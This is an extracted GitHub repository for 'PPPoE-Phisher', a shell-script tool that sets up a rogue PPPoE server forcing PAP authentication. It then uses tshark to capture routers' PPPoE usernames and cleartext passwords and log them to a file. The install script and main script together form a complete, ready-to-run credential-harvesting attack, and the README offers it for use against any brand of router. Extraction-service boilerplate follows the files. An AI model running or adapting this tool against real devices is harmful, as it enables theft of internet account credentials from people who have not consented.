Repository: qingxp9/PPPoE-Phisher Branch: master Commit: b217803a9cab Files: 4 Total size: 863 B Directory structure: gitextract_zacwb9d_/ ├── README.md ├── install.sh ├── pap.log └── pppoe_phisher.sh ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ # PPPoE-Phisher A tool for sniffing PPPoE username/password for any brand of router. It can be installed on Android with Kali Linux Nethunter or others. ## Usage ``` #install and configure pppoe server and tshark #sudo ./install.sh sudo ./pppoe_phisher.sh ``` ================================================ FILE: install.sh ================================================ #! /bin/sh # This mirror for Nethunter 3.0 # echo "deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib" > /etc/apt/sources.list apt update apt install -y pppoe tshark touch /etc/ppp/pppoe-server-options echo "require-pap" > /etc/ppp/pppoe-server-options echo "lcp-echo-interval 10" >> /etc/ppp/pppoe-server-options echo "lcp-echo-failure 2" >> /etc/ppp/pppoe-server-options echo "* * * *" > /etc/ppp/pap-secrets ================================================ FILE: pap.log ================================================ ================================================ FILE: pppoe_phisher.sh ================================================ #!/bin/sh /usr/sbin/pppoe-server -L 10.5.5.1 -R 10.5.5.10 -I eth0 -S yyf tshark -i eth0 -Y "pap.password" -l -T fields -e pap.peer_id -e pap.password | tee -a pap.log
gitextract_zacwb9d_/ ├── README.md ├── install.sh ├── pap.log └── pppoe_phisher.sh
Condensed preview — 4 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1K chars).
[
{
"path": "README.md",
"chars": 263,
"preview": "# PPPoE-Phisher\n\nA tool for sniffing PPPoE username/password for any brand of router. It can be installed on Android wit"
},
{
"path": "install.sh",
"chars": 433,
"preview": "#! /bin/sh\n# This mirror for Nethunter 3.0\n# echo \"deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contri"
},
{
"path": "pap.log",
"chars": 0,
"preview": ""
},
{
"path": "pppoe_phisher.sh",
"chars": 167,
"preview": "#!/bin/sh\n/usr/sbin/pppoe-server -L 10.5.5.1 -R 10.5.5.10 -I eth0 -S yyf\ntshark -i eth0 -Y \"pap.password\" -l -T fields -"
}
]
About this extraction
This page contains the full source code of the qingxp9/PPPoE-Phisher GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 4 files (863 B), approximately 422 tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.